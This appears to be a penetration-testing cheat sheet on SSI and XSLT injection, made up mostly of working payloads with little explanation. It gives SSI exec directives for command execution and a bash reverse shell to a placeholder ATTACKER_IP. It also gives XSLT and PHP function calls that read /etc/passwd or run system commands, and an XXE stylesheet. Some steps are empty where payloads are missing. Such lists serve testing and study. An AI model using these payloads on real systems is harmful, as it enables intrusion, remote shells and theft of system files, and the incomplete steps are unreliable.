SSI & XSLT Injection

Server-Side Includes (SSI) Injection

SSI directives instruct web servers to include dynamic content. Common file extensions: .shtml, .shtm, .stm

Supported by: Apache, IIS, nginx (with module)

SSI Syntax

<!--#directive param="value" -->

SSI Payloads

Print Environment Variables

<!--#printenv -->

Print Specific Variable

<!--#echo var="DOCUMENT_NAME" -->
<!--#echo var="DOCUMENT_URI" -->
<!--#echo var="DATE_LOCAL" -->
<!--#echo var="LAST_MODIFIED" -->

Include File (Web Root Only)

<!--#include virtual="index.html" -->
<!--#include virtual="/etc/passwd" -->

RCE via exec

<!--#exec cmd="id" -->
<!--#exec cmd="whoami" -->
<!--#exec cmd="cat /etc/passwd" -->
<!--#exec cmd="ls -la" -->

Reverse Shell

<!--#exec cmd="bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1" -->

Confirm SSI Injection

Look for .shtml file extensions
Inject  and check if environment variables appear
Inject  for RCE

XSLT Injection

XSLT (eXtensible Stylesheet Language Transformations) transforms XML documents. Injection occurs when user input is inserted into XSL data before processing.

Confirm XSLT Injection

Inject a broken XML tag to trigger an error:

Information Disclosure

Version: <xsl:value-of select="system-property('xsl:version')" />
Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
Product Name: <xsl:value-of select="system-property('xsl:product-name')" />
Product Version: <xsl:value-of select="system-property('xsl:product-version')" />

Local File Read

XSLT 2.0+

<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />

PHP (if PHP functions enabled)

<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />

RCE (PHP)

<xsl:value-of select="php:function('system','id')" />
<xsl:value-of select="php:function('system','whoami')" />
<xsl:value-of select="php:function('passthru','cat /etc/passwd')" />

XSLT External Entity (XXE)

<?xml version="1.0"?>
<!DOCTYPE xsl:stylesheet [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    &xxe;
  </xsl:template>
</xsl:stylesheet>

Common XSLT Processors

Processor

Language

Notes

libxslt

Common on Linux, supports XSLT 1.0

Saxon

Java

Supports XSLT 1.0, 2.0, 3.0

Xalan

Java/C++

Apache project

MSXML

.NET

Windows

PreviousSSTI NextAuthentication Bypass

Last updated 4 days ago

hashtagServer-Side Includes (SSI) Injection

hashtagSSI Syntax

hashtagSSI Payloads

hashtagPrint Environment Variables

hashtagPrint Specific Variable

hashtagInclude File (Web Root Only)

hashtagRCE via exec

hashtagReverse Shell

hashtagConfirm SSI Injection

hashtagXSLT Injection

hashtagConfirm XSLT Injection

hashtagInformation Disclosure

hashtagLocal File Read

hashtagXSLT 2.0+

hashtagPHP (if PHP functions enabled)

hashtagRCE (PHP)

hashtagXSLT External Entity (XXE)

hashtagCommon XSLT Processors